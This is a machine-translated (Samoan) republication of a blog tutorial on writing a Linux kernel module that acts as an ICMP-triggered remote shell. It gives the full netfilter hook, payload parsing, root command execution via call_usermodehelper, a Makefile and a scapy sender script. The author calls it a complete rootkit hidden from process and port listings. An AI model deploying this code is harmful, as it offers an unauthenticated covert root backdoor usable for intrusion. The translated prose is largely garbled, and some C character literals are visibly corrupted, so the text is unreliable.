ProHoster > Blog > Pulega > Ati faaniukilia i luga ole ICMP

Ati faaniukilia i luga ole ICMP

Ati faaniukilia i luga ole ICMP

TL; AMA: O loʻo ou tusia se module kernel o le a faitau poloaiga mai le uta ICMP ma faʻatino i luga o le 'auʻaunaga tusa lava pe paʻu lau SSH. Mo le sili ona le onosai, o le code uma lava github.

Faʻaeteete! O tagata fai polokalame C poto masani e ono tafe mai i loimata o le toto! Atonu foi ou te sese i faaupuga, ae o soo se faitioga e talia. O le pou e faʻamoemoe mo i latou o loʻo i ai se manatu faigata tele o polokalame C ma manaʻo e vaʻai i totonu o Linux.

I faʻamatalaga i laʻu muamua tusiga taʻua SoftEther VPN, lea e mafai ona faʻataʻitaʻiina nisi o tulafono masani, aemaise lava HTTPS, ICMP ma e oʻo lava i DNS. E mafai ona ou mafaufauina pe faʻapefea ona galue muamua, talu ai ou te masani tele i le HTTP (S), ma e tatau ona ou aʻoaʻoina le tunneling i luga ole ICMP ma DNS.

Ati faaniukilia i luga ole ICMP

Ioe, i le 2020 na ou aʻoaʻoina e mafai ona e faʻaofiina se totogi faʻapitoa i totonu o pusa ICMP. Ae sili atu le tuai nai lo le leai! Ma talu ai e mafai ona faia se mea e uiga i ai, o lona uiga e tatau ona faia. Talu ai i loʻu olaga i aso uma e masani ona ou faʻaaogaina le laina o le poloaiga, e aofia ai le SSH, o le manatu o se atigi ICMP na oʻo mai i loʻu mafaufau muamua. Ma ina ia mafai ona faʻapotopotoina se bingo bullshield atoatoa, na ou filifili ai e tusi o se Linux module i se gagana e naʻo soʻu manatu faigata. O sea atigi o le a le vaaia i le lisi o faiga, e mafai ona e utaina i totonu o le fatu ma o le a le i luga o le faila faila, e te le vaʻai i se mea masalosalo i le lisi o faʻalogo ports. E tusa ai ma ona gafatia, o se rootkit atoatoa lea, ae ou te faʻamoemoe e faʻaleleia ma faʻaaogaina e fai ma atigi mulimuli pe a maualuga tele le Load Average e ulufale ai e ala i le SSH ma faʻatino a itiiti ifo. echo i > /proc/sysrq-triggere toe fa'afo'i le avanoa e aunoa ma le toe fa'afouina.

Matou te ave se tusitala tusitusiga, tomai faʻavae polokalame ile Python ma C, Google ma fa'afoliga lea e te le mafaufau e tuʻu i lalo o le naifi pe a malepe mea uma (filifiliga - VirtualBox / KVM / etc) ma tatou o!

Itu fa'atau

Na foliga mai ia te aʻu o le vaega a le tagata o tausia e tatau ona ou tusia se tala e tusa ma le 80 laina, ae sa i ai tagata agalelei na faia mo au. galuega uma. O le faʻailoga na faʻafuaseʻi ona faigofie, fetaui i laina taua e 10:

import sys
from scapy.all import sr1, IP, ICMP

if len(sys.argv) < 3:
    print('Usage: {} IP "command"'.format(sys.argv[0]))
    exit(0)

p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
    p.show()

O le tusitusiga e lua finauga, o se tuatusi ma se uta. Aʻo leʻi tuʻuina atu, o le uta e muamua i se ki run:, o le a matou manaʻomia e faʻateʻaina ai afifi faʻatasi ai ma uta faʻafuaseʻi.

O le fatu e manaʻomia avanoa e faʻapipiʻi ai afifi, o lea e tatau ai ona faʻatautaia le tusitusiga e avea ma superuser. Aua nei galo e tuuina atu faatagaga faatino ma faapipii scapy lava. Debian ei ai se afifi e taʻua python3-scapy. Ole taimi nei e mafai ona e siaki pe fa'afefea uma.

Tamomoe ma fa'aulufaleina le fa'atonuga
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!

O le mea lea e foliga mai i le sogisogi
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1] [Response time: 19.094 ms] Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

^C2 packets captured

E le suia le uta i le afifi tali.

Kernel module

Ina ia fausia i totonu o se masini komepiuta Debian e te manaʻomia a itiiti ifo make и linux-headers-amd64, o isi mea o le a o'o mai i tulaga fa'alagolago. O le a ou le tuʻuina atu le code atoa i le tusiga e mafai ona e faʻapipiʻi ile Github.

Seti matau

I le amataga, matou te manaʻomia ni galuega se lua e faʻapipiʻi ai le module ma faʻapipiʻi. E le manaʻomia le galuega mo le laʻuina o uta, ae o lea rmmod o le a le aoga;

#include <linux/module.h>
#include <linux/netfilter_ipv4.h>

static struct nf_hook_ops nfho;

static int __init startup(void)
{
  nfho.hook = icmp_cmd_executor;
  nfho.hooknum = NF_INET_PRE_ROUTING;
  nfho.pf = PF_INET;
  nfho.priority = NF_IP_PRI_FIRST;
  nf_register_net_hook(&init_net, &nfho);
  return 0;
}

static void __exit cleanup(void)
{
  nf_unregister_net_hook(&init_net, &nfho);
}

MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);

O le a le mea o loʻo tupu iinei:

  1. E lua faila ulutala e tosoina i totonu e faʻaogaina le module lava ia ma le netfilter.
  2. O gaioiga uma e alu i totonu o le netfilter, e mafai ona e setiina ni matau i totonu. Ina ia faia lenei mea, e tatau ona e faʻaalia le fausaga o le a faʻapipiʻi ai le matau. O le mea pito sili ona taua o le faʻamaonia lea o le galuega o le a faʻatinoina o se matau: nfho.hook = icmp_cmd_executor; O le a ou alu i le galuega lava ia mulimuli ane.
    Ona ou setiina lea o le taimi galue mo le afifi: NF_INET_PRE_ROUTING fa'amaoti mai e fa'agasolo le afifi pe a fa'aalia muamua ile fatu. E mafai ona fa'aaogaina NF_INET_POST_ROUTING e fa'agasolo le afifi pe a alu ese mai le fatu.
    Ua ou setiina le faamama i le IPv4: nfho.pf = PF_INET;.
    Ou te tuuina atu la'u matau le faamuamua aupito maualuga: nfho.priority = NF_IP_PRI_FIRST;
    Ma ou te resitalaina le fausaga o faʻamaumauga e pei o le matau moni: nf_register_net_hook(&init_net, &nfho);
  3. O le galuega mulimuli e aveese ai le matau.
  4. O le laisene o loʻo faʻaalia manino ina ia le faitio le tagata faʻapipiʻi.
  5. Galuega tauave module_init() и module_exit() seti isi galuega e amatalia ma faamutaina le module.

Toe aumai le uta

O lea la e tatau ona tatou aveese le uta, o le mea lea na avea ma galuega sili ona faigata. O le fatu e leai ni galuega faʻapipiʻi mo le galue i uta;

#include <linux/ip.h>
#include <linux/icmp.h>

#define MAX_CMD_LEN 1976

char cmd_string[MAX_CMD_LEN];

struct work_struct my_work;

DECLARE_WORK(my_work, work_handler);

static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;

  iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

  user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
  tail = skb_tail_pointer(skb);

  j = 0;
  for (i = user_data; i != tail; ++i) {
    char c = *(char *)i;

    cmd_string[j] = c;

    j++;

    if (c == '')
      break;

    if (j == MAX_CMD_LEN) {
      cmd_string[j] = '';
      break;
    }

  }

  if (strncmp(cmd_string, "run:", 4) != 0) {
    return NF_ACCEPT;
  } else {
    for (j = 0; j <= sizeof(cmd_string)/sizeof(cmd_string[0])-4; j++) {
      cmd_string[j] = cmd_string[j+4];
      if (cmd_string[j] == '')
	break;
    }
  }

  schedule_work(&my_work);

  return NF_ACCEPT;
}

O le a le mea o tupu:

  1. Sa tatau ona ou aofia ai faila faila faaopoopo, o le taimi lenei e faʻaogaina ai ulutala IP ma ICMP.
  2. Ou te setiina le umi o laina maualuga: #define MAX_CMD_LEN 1976. Aisea tonu lea? Aua ua faitio le tagata tuufaatasia! Ua uma ona latou fautua mai ia te aʻu e tatau ona ou malamalama i le faaputuga ma le faaputuga, o le a i ai se aso ou te faia ai lenei mea ma atonu foi e faasaʻo le code. Na vave ona ou setiina le laina o le ai ai le poloaiga: char cmd_string[MAX_CMD_LEN];. E tatau ona faʻaalia i galuega uma; O le a ou talanoa atili e uiga i lenei mea ile parakalafa 9.
  3. Ole taimi nei e tatau ona tatou amata (struct work_struct my_work;) fausaga ma faʻafesoʻotaʻi ma se isi galuega (DECLARE_WORK(my_work, work_handler);). O le a ou talanoa foi pe aisea e tatau ai i le parakalafa lona iva.
  4. O lea ou te folafola atu se galuega, lea o le a avea ma matau. O le ituaiga ma le taliaina o finauga e fa'atonuina e le netfilter, matou te fiafia i ai skb. Ole socket buffer, ose fa'amaumauga fa'avae e iai fa'amatalaga avanoa uma e uiga i se afifi.
  5. Mo le galuega e galue, e te manaʻomia ni fausaga se lua ma ni fesuiaiga, e aofia ai le lua iterators. 
      struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;
  6. E mafai ona tatou amata i le manatu. Mo le faʻaogaina o le module, e leai ni paʻu e ese mai i le ICMP Echo e manaʻomia, o lea matou te faʻapipiʻi ai le paʻu e faʻaaoga ai galuega faʻapipiʻi ma lafo ese uma pepa e le o ICMP ma non-Echo. Toe fo'i NF_ACCEPT o lona uiga o le taliaina o le afifi, ae e mafai foi ona e tuʻuina afifi e ala i le toe foʻi mai NF_DROP. 
      iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

    Ou te leʻi faʻataʻitaʻiina le mea o le a tupu e aunoa ma le siakiina o ulutala IP. O lo'u iloa itiiti o le C e ta'u mai ai a aunoa ma ni siaki fa'aopoopo, e ono tupu se mea mata'utia. O le a ou fiafia pe a e taofia aʻu i lenei mea!

  7. I le taimi nei o le afifi o le ituaiga tonu e te manaʻomia, e mafai ona e suʻeina faʻamaumauga. A aunoa ma se galuega faʻapipiʻi, e tatau ona e mauaina muamua se faʻailoga i le amataga o le uta. E faia lenei mea i se nofoaga e tasi, e tatau ona e ave le faʻailoga i le amataga o le ulutala ICMP ma faʻanofo i le tele o lenei ulutala. O mea uma e faʻaaogaina fausaga icmph: user_data = (unsigned char *)((unsigned char *)icmph + (sizeof(icmph)));
    O le pito o le ulutala e tatau ona fetaui ma le pito o le uta i totonu skb, o lea matou te maua ai e faʻaaoga ai auala faaniukilia mai le fausaga tutusa: tail = skb_tail_pointer(skb);.

    Ati faaniukilia i luga ole ICMP

    Na gaoia le ata mai iinei, e mafai ona e faitau atili e uiga i le socket buffer.

  8. A maua loa au fa'asino ile amataga ma le fa'ai'uga, e mafai ona e kopiina fa'amaumauga i se manoa cmd_string, siaki mo le iai o se prefix run: ma, a le tia'i le afifi pe a misi, pe toe tusi le laina, aveese lenei prefix.
  9. O le mea lena, o lea e mafai ona e valaʻau i se isi tagata faʻatau: schedule_work(&my_work);. Talu ai e le mafai ona pasi se parakalafa i sea valaʻau, o le laina ma le poloaiga e tatau ona faʻavaomalo. schedule_work() o le a tuʻuina le galuega e fesoʻotaʻi ma le fausaga ua pasia i totonu o le laina lautele o le faʻatulagaina o galuega ma faʻamaeʻa, faʻatagaina oe e le faʻatali mo le faʻatonuga e maeʻa. E tatau lenei mea ona e tatau ona matua televave le matau. A leai, o lau filifiliga o le leai o se mea e amata pe o le ae maua se kernel panic. O le tuai e pei o le oti!
  10. O le mea lena, e mafai ona e talia le afifi ma se toe faafoi tutusa.

Valaauina se polokalame ile userspace

O lenei galuega e sili ona malamalama. O lona igoa na tuuina mai i totonu DECLARE_WORK(), o le ituaiga ma finauga taliaina e le manaia. Matou te ave le laina ma le poloaiga ma pasi atoa i le atigi. Tuu atu ia te ia e taulimaina le parsing, saili mo binaries ma isi mea uma.

static void work_handler(struct work_struct * work)
{
  static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
  static char *envp[] = {"PATH=/bin:/sbin", NULL};

  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

  1. Seti finauga i se seti o manoa argv[]. Ou te manatu e iloa e tagata uma o polokalame o loʻo faʻatinoina i lenei auala, ae le o se laina faʻaauau ma avanoa.
  2. Seti suiga ole siosiomaga. Na ou faʻaofiina naʻo le PATH ma se seti maualalo o auala, faʻamoemoe ua uma ona tuʻufaʻatasia /bin с /usr/bin и /sbin с /usr/sbin. O isi auala e seasea taua i le faatinoga.
  3. Ua uma, tatou faia! Galulue fatu call_usermodehelper() talia le ulufale. ala i le binary, array of arguments, array of environment variables. O iinei ou te manatu foi e malamalama tagata uma i le uiga o le pasia o le ala i le faila faila o se finauga ese, ae e mafai ona e fesili. O le finauga mulimuli e fa'amaoti mai pe fa'atali mo le fa'agasologa e mae'a (UMH_WAIT_PROC), amata le faagasologa (UMH_WAIT_EXEC) pe le faatali lava (UMH_NO_WAIT). E i ai nisi mea UMH_KILLABLE, Ou te lei tilotilo i ai.

Fono Aoao

O le fa'apotopotoina o fa'aoga fatu e fa'atinoina e ala i le fa'a-fa'a-fa'ameamea. Valaau make i totonu o se lisi faʻapitoa e nonoa i le kernel version (faʻamatalaina iinei: KERNELDIR:=/lib/modules/$(shell uname -r)/build), ma o le nofoaga o le module e pasi atu i le fesuiaiga M i finauga. O le icmpshell.ko ma sini mama e faʻaogaina atoa lenei faʻavae. IN obj-m o lo'o fa'ailoa mai ai le faila faila o le a liua i se module. Syntax e toe faia main.o в icmpshell.o (icmpshell-objs = main.o) e le fetaui lelei ia te aʻu, ae ia faʻapea.

KERNELDIR:=/lib/modules/$(shell uname -r)/build

obj-m = icmpshell.o
icmpshell-objs = main.o

all: icmpshell.ko

icmpshell.ko: main.c
make -C $(KERNELDIR) M=$(PWD) modules

clean:
make -C $(KERNELDIR) M=$(PWD) clean

Matou te aoina: make. utaina: insmod icmpshell.ko. Ua uma, e mafai ona e siaki: sudo ./send.py 45.11.26.232 "date > /tmp/test". Afai ei ai sau faila i lau masini /tmp/test ma o loʻo i ai le aso na tuʻuina atu ai le talosaga, o lona uiga na e faia mea uma ma saʻo na ou faia mea uma.

iʻuga

O loʻu aafiaga muamua i le atinaʻeina faaniukilia sa sili atu ona faigofie nai lo le mea na ou faʻamoemoeina. E tusa lava pe leai se poto masani e atiaʻe i le C, e taulaʻi atu i faʻamatalaga tuʻufaʻatasia ma Google iʻuga, na mafai ona ou tusia se module galue ma lagona e pei o se fatu hacker, ma i le taimi lava e tasi o se tamaititi tusitusi. E le gata i lea, na ou alu i le Kernel Newbies channel, lea na latou fai mai ai ou te faʻaoga schedule_work() nai lo le valaau call_usermodehelper() i totonu o le matau lava ia ma faalumaina o ia, ma sa'o le masalomia o se taufaavalea. O le selau o laina code na tau ia te aʻu e tusa ma le vaiaso o le atinaʻe i loʻu taimi avanoa. O se aafiaga manuia na fa'aumatia ai a'u lava tala fa'asolopito e uiga i le lavelave tele o le atina'eina o faiga.

Afai e malie se tasi e fai se iloiloga faʻailoga ile Github, ou te faʻafetai. Ou te mautinoa lava sa ou faia le tele o mea sese faavalevalea, aemaise lava pe a galue i manoa.

Ati faaniukilia i luga ole ICMP

puna: www.habr.com

Faaopoopo i ai se faamatalaga